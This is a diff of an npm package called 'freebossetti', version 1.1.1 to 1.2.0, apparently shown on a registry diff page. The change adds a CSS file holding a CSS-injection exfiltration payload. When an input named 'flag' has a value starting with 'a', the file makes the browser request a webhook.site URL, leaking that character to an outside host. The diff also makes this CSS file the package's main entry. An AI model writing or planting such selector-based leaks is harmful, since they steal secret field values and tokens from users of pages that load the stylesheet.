freebossetti 1.1.1 → 1.2.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/freebossetti.css +3 -0
  2. package/package.json +2 -2
@@ -0,0 +1,3 @@
1
+ input[name=flag][value=^a] {
2
+ background-image: url(https://webhook.site/26c5dbf7-e176-4859-81e1-cdfa0b13b14c/log?a);
3
+ }
package/package.json CHANGED
@@ -1,8 +1,8 @@
1
1
  {
2
2
  "name": "freebossetti",
3
- "version": "1.1.1",
3
+ "version": "1.2.0",
4
4
  "description": "BOSSETTI LIBERO!",
5
- "main": "bossetti.html",
5
+ "main": "freebossetti.css",
6
6
  "scripts": {
7
7
  "test": "echo \"Error: no test specified\" && exit 1"
8
8
  },